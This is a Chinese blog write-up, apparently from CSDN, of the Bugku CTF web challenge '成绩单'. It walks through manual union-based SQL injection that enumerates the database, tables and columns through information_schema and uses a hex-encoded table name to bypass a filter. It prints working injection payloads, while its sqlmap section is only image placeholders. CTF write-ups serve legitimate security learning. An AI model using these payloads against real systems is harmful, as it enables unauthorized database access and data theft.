成绩单 (bugku--web)

本文详细介绍了一种名为SQL注入的安全攻击手法。通过实例演示了如何利用SQL注入获取数据库信息,包括库名、表名和字段名,最终获取敏感数据。文章还提到了手工注入的过程和技巧。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

解法一:手工注入

输入1,2,3分别能查到1,2,3号学生的成绩

SQL注入应该没跑了

输入1’返回异常,输入1’–+返回异常,输入1’ #或者1’-- +返回正常,看来过滤了–+

观察,表貌似有四列(名字,Math,English,Chinese),输入1’ order by 4#返回正常,输入1’ order by 5#返回异常,看来的确是4列

接下来就开始暴库名、表名、字段名

尝试联合查询,记得把前面的查询数据置空,写成id=-1即可,显示正常,说明确确实实存在这四列数据

我们先手遍历一遍 id=-1’ union select 1,2,3,4#

发现有四个表且都有回显

于是 就开始爆破吧
首先爆库名:通过id=-1’ union select 1,2,3,database()#得到数据库名字skctf_flag
然后爆表:通过使用 id=-1’ union select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database()#
得到表名:fl4g,sc
接下来我们就要暴字段了
通过id=-1’ union select 1,2,3,group_concat(column_name) from information_schema.columns where table_name=0x666c3467# //这里需要用16进制绕过得到字段skctf_flag
最后就是查询数据了,通过使用:id=-1’ union select 1,2,3,skctf_flag from fl4g#
想要了解information_schema点击这里

解法二:sqlmap

在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值